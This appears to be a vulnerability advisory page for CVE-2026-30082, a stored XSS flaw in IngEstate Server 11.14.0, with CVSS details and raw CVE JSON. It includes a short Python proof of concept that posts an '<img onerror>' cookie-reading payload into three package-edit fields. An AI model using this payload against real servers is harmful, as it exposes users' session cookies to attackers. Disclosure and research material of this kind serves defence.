Security Vulnerability Report
中文
CVE-2026-30082 CVSS 6.1 MEDIUM

CVE-2026-30082

Published: 2026-03-30 15:16:26
Last Modified: 2026-04-27 19:18:47

Description

Multiple stored cross-site scripting (XSS) vulnerabilities in the Edit feature of the Software Package List page of IngEstate Server v11.14.0 allow attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the About application, What's news, or Release note parameters.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

IngEstate Server 11.14.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Proof of Concept for CVE-2026-30082 # Target: IngEstate Server v11.14.0 url = "http://target-server/api/package/edit" # Malicious payload to execute JavaScript payload = '<img src=x onerror=alert(document.cookie)>' data = { "about_application": payload, "whats_news": payload, "release_note": payload } # Send the malicious request to store the payload response = requests.post(url, data=data) if response.status_code == 200: print("Payload injected successfully. Check the Software Package List page.") else: print("Failed to inject payload.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30082", "sourceIdentifier": "[email protected]", "published": "2026-03-30T15:16:26.320", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple stored cross-site scripting (XSS) vulnerabilities in the Edit feature of the Software Package List page of IngEstate Server v11.14.0 allow attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the About application, What's news, or Release note parameters."}, {"lang": "es", "value": "Múltiples vulnerabilidades de cross-site scripting (XSS) almacenadas en la función de Edición de la página de Lista de Paquetes de Software de IngEstate Server v11.14.0 permiten a los atacantes ejecutar scripts web arbitrarios o HTML mediante la inyección de una carga útil manipulada en los parámetros About application, What's news o Release note."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "http://ingestate.com", "source": "[email protected]"}, {"url": "https://github.com/Cr0wld3r/CVE-2026-30082", "source": "[email protected]"}, {"url": "https://ingenico.com/", "source": "[email protected]"}]}}